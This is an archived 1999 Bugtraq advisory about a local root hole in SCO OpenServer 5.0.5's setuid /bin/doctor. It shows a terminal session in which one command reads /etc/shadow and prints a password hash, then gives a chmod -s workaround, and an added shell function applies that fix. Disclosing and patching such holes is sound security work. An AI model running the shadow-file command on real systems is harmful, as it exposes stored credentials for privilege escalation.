Bugtraq mailing list archives
SCO OpenServer 5.0.5 /bin/doctor root compromise
From: btellier () WEBLEY COM (Brock Tellier)
Date: Tue, 7 Sep 1999 10:44:42 -0500
Greetings,

INFO:
There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others. By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow).

Example:

scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX:
Just chmod -s until SCO comes out with a fix. Although I certainly won't be changing it back to suid root anytime soon. If a hole like this exists, there are undoubtedly countless more lurking within.

Brock Tellier
Systems Administrator
Webley Systems
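The workaround from the FIX paragraph above, as an added example that is not part of the original post: a POSIX shell function that clears the setuid/setgid bits on one binary and verifies they are gone. The function name strip_suid is hypothetical; /bin/doctor is the path named in the post.

```shell
#!/bin/sh
# Added example (not from the original post): apply the post's "chmod -s"
# workaround to one binary and verify that it took effect.
# strip_suid is a hypothetical helper name.
#
# Return codes: 0 = setuid/setgid bits removed, 1 = nothing to do,
#               2 = not a regular file, 3 = chmod failed or bits still set.
strip_suid() {
    target=$1

    # Refuse symlinks and non-regular files so chmod cannot be redirected
    # to a different file than the one the administrator named.
    if [ -L "$target" ] || [ ! -f "$target" ]; then
        echo "strip_suid: $target is not a regular file" >&2
        return 2
    fi

    # test -u / -g are the POSIX checks for the setuid and setgid bits.
    if [ ! -u "$target" ] && [ ! -g "$target" ]; then
        echo "strip_suid: $target has no setuid/setgid bit" >&2
        return 1
    fi

    # Record the listing first so the original mode and owner can be
    # restored once a vendor fix is installed.
    echo "before: $(ls -ld "$target")"

    # u-s,g-s clears the same two bits as the post's "chmod -s".
    chmod u-s,g-s "$target" || return 3

    # Verify the result instead of trusting the exit status alone.
    if [ -u "$target" ] || [ -g "$target" ]; then
        echo "strip_suid: bits still set on $target" >&2
        return 3
    fi
    echo "after:  $(ls -ld "$target")"
    return 0
}

# Usage on the affected host, as root (path taken from the post):
#   strip_suid /bin/doctor
```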